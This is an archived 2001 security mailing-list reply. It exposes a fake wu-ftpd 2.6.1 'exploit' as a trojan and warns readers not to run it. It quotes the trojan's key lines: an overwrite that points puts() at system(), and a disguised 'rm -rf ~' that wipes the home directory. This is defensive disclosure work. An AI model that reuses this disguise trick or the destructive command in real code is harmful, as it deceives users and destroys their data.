Re: wuftpd 2.6.1 advisory/exploit

From: mrcdz (mrcdzat_private)
Date: Wed Sep 19 2001 - 10:57:51 PDT

  • Next message: Pedro Miller Rabinovitch: "WARNING! Fake exploit (was: wuftpd 2.6.1 advisory/exploit)"

    You are correct, this is a spoof.
    Do you think Carolyn would post something like this? :)
    
    -- from "exploit":
     *
     * Demonstrates a flaw in the pre-authentication code of
     * wuftpd 2.6.x which allows us to gain control of the
     * target process by displacing a saved frame pointer.
     *
    
    Obviously this is not a real vulnerability in wuftpd 2.6.1 nor an exploit.
    If you look behind all the garble, you'll see this:
     
    sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);
    
    and then:
    
    puts("echo ~ ok, it seems to have worked... remember: \");
    puts("rm -rf is not elite ~");
    
    puts(3) function has been overwritten with the address of system(3), where
    anyone skimming through the source code would think it is simply printing
    those two lines. (notice the backslash on the first, either a coding mistake
    or to 'deter script kids'.) It is actually executing them via system(3).
    
    Please do not run this code. Your home directory will be wiped out.
    And if $HOME is set to '/'; Well then, you're in big trouble.
    
    On Wed, Sep 19, 2001 at 08:38:14AM -0700, Blue Boar wrote:
    > Hey, I'm told that this exploit like eats your hard drive or something.
    > Caveat emptor and all, but I figured since I actually heard about this,
    > I'd let you know.  I guess it's a spoofed note.
    > 
    > 					BB
    



    This archive was generated by hypermail 2b30 : Thu Sep 20 2001 - 09:33:37 PDT